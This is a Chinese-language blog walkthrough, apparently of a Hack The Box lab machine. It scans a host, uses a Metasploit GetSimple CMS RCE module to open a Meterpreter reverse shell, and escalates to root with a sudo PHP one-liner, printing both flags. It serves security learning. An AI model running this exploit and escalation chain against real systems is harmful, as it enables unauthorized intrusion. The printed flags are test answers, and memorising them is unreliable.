HgTrojan blog每日一练
题目
解答
题目一
首先nmap扫描,进行信息收集
┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.86.24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 06:00 EST
Nmap scan report for 10.129.86.24
Host is up (1.1s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.36 seconds
msf搜索GetSimple存在的漏洞
┌──(root㉿HgTrojan)-[~]
└─# msfconsole
Metasploit tip: Start commands with a space to avoid saving them to history
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
search GetSimple
msf6 > search GetSimple
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability
1 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec
msf6 >
利用漏洞获取立足点
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 10.129.86.24
rhosts => 10.129.86.24
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set lhost tun0
lhost => 10.10.16.25
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.16.25:4444
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.86.24:36112) at 2024-01-26 06:06:14 -0500
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 2 opened (10.10.16.25:4444 -> 10.129.86.24:36116) at 2024-01-26 06:06:25 -0500
meterpreter >
查找目标txt文件并输出,完成第一题
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2021-05-07 10:28:39 -0400 mrb3n
meterpreter > cd mrb3n
meterpreter > ls
Listing: /home/mrb3n
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2024-01-26 04:01:36 -0500 .bash_history
100644/rw-r--r-- 220 fil 2020-02-25 07:03:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2020-02-25 07:03:22 -0500 .bashrc
040700/rwx------ 4096 dir 2021-02-09 04:12:07 -0500 .cache
100644/rw-r--r-- 807 fil 2020-02-25 07:03:22 -0500 .profile
100644/rw-r--r-- 0 fil 2021-02-09 05:56:38 -0500 .sudo_as_admin_successful
100600/rw------- 10332 fil 2021-05-07 10:28:39 -0400 .viminfo
100664/rw-rw-r-- 33 fil 2021-02-16 06:00:55 -0500 user.txt
meterpreter > cat user.txt
7002d65b149b0a4d19132a66feed21d8
第二题
利用php shell 来完成
语句参考:https://gtfobins.github.io/gtfobins/php/
详细过程:
meterpreter > shell
Process 75314 created.
Channel 1 created.
whoami
www-data
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
#我们可以发现在/usr/bin/php,我们(即:www-data)有all权限
#启动一个 /bin/sh 的 Shell
CMD="/bin/sh"
#以超级用户权限用PHP直接执行代码,代码内容为调用 PHP 的 system 函数,用于执行系统命令。它会执行 $CMD 变量中存储的 Shell 命令,这里即为 /bin/sh。
sudo php -r "system('$CMD');"
#如此我们就获取到了root权限
whoami
root
查找目标txt文件并输出,完成第二题
cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
打赏: 
支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
It's going to bee ending of mine day, bbut before ending I am reading this fantastic paragraph to
improve my knowledge.